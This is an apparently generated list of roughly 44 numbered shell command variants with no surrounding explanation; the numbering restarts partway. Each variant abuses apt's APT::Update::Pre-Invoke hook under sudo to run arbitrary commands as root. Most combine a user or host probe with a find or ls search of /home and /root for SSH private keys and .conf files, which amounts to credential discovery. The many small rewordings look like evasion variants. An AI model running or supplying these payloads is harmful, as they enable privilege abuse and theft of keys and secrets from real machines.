17. `sudo apt -o "APT::Update::Pre-Invoke::=bash -c 'whoami'; find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
18. `sudo apt -o "APT::Update::Pre-Invoke::=/bin/sh -c whoami; find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
19. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -regex '.*id_rsa' -o -regex '.*\.conf'" update -qq`
20. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -type f \\( -name 'id_rsa' -o -name '*.conf' \\)" update -qq`
21. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name 'id_rsa' -a -readable -o -name '*.conf'" update -qq`
22. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name 'id_rsa' -o -path '*.conf'" update -qq`
23. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name 'id_rsa' -print -o -name '*.conf' -print" update -qq`
24. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -name id_rsa -o -name *.conf" update -qq`
25. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; find /home /root -type f -iname id_rsa -o -iname '*.conf'" update -qq`
26. `sudo apt -o "APT::Update::Pre-Invoke::=whoami; ls -alR /home /root | grep -E 'id_rsa|\\.conf'" update -qq`
27. `sudo apt -o "APT::Update::Pre-Invoke::=getent passwd $(whoami); find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
28. `sudo apt -o "APT::Update::Pre-Invoke::=true; find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
29. `sudo apt -o "APT::Update::Pre-Invoke::=hostname; find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
30. `sudo apt -o "APT::Update::Pre-Invoke::=uname -a; find /home /root -name 'id_rsa' -o -name '*.conf'" update -qq`
1. `sudo apt -o "APT::Update::Pre-Invoke::=id -u -n; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
2. `sudo apt -o "APT::Update::Pre-Invoke::=echo $USER; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
3. `sudo apt -o "APT::Update::Pre-Invoke::=printf '%s\n' $(whoami); find /home /root -name id_rsa -o -name '*.conf'" update -qq`
4. `sudo apt -o "APT::Update::Pre-Invoke::=$(which whoami); find /home /root -name id_rsa -o -name '*.conf'" update -qq`
5. `sudo apt -o "APT::Update::Pre-Invoke::=/usr/bin/whoami; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
6. `sudo apt -o "APT::Update::Pre-Invoke::=/usr/bin/env whoami; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
7. `sudo apt -o "APT::Update::Pre-Invoke::=awk 'BEGIN{system(\"whoami\")}' ; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
8. `sudo apt -o "APT::Update::Pre-Invoke::=perl -e 'exec(\"whoami\")'; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
9. `sudo apt -o "APT::Update::Pre-Invoke::=printf root\n; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
10. `sudo apt -o "APT::Update::Pre-Invoke::=expr 0 + 1; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
11. `sudo apt -o "APT::Update::Pre-Invoke::=echo admin; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
12. `sudo apt -o "APT::Update::Pre-Invoke::=logger whoami; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
13. `sudo apt -o "APT::Update::Pre-Invoke::=nohup whoami; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
14. `sudo apt -o "APT::Update::Pre-Invoke::=timeout 1 whoami; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
15. `sudo apt -o "APT::Update::Pre-Invoke::=stdbuf -oL whoami; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
16. `sudo apt -o "APT::Update::Pre-Invoke::=script -q -c whoami /dev/null; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
17. `sudo apt -o "APT::Update::Pre-Invoke::='head -c 0 /dev/null'; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
18. `sudo apt -o "APT::Update::Pre-Invoke::=uname -n; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
19. `sudo apt -o "APT::Update::Pre-Invoke::=lsb_release -a; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
20. `sudo apt -o "APT::Update::Pre-Invoke::=true; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
21. `sudo apt -o "APT::Update::Pre-Invoke::=echo 2130706433 | awk '{printf \"%d.%d.%d.%d\\n\", ($1>>24)&255,($1>>16)&255,($1>>8)&255,$1&255}'; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
22. `sudo apt -o "APT::Update::Pre-Invoke::=bash -c 'i=127;j=0;k=0;l=1; echo $i.$j.$k.$l'; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
23. `sudo apt -o "APT::Update::Pre-Invoke::=ip a | grep inet; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
24. `sudo apt -o "APT::Update::Pre-Invoke::=hostnamectl; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
25. `sudo apt -o "APT::Update::Pre-Invoke::=env | grep USER; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
26. `sudo apt -o "APT::Update::Pre-Invoke::=printenv USER; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
27. `sudo apt -o "APT::Update::Pre-Invoke::=ps -p $$; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
28. `sudo apt -o "APT::Update::Pre-Invoke::=who -m; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
29. `sudo apt -o "APT::Update::Pre-Invoke::=uptime; find /home /root -name id_rsa -o -name '*.conf'" update -qq`
30. `sudo apt -o "APT::Update::Pre-Invoke::=date; find /home /root -name id_rsa -o -name '*.conf'" update -qq`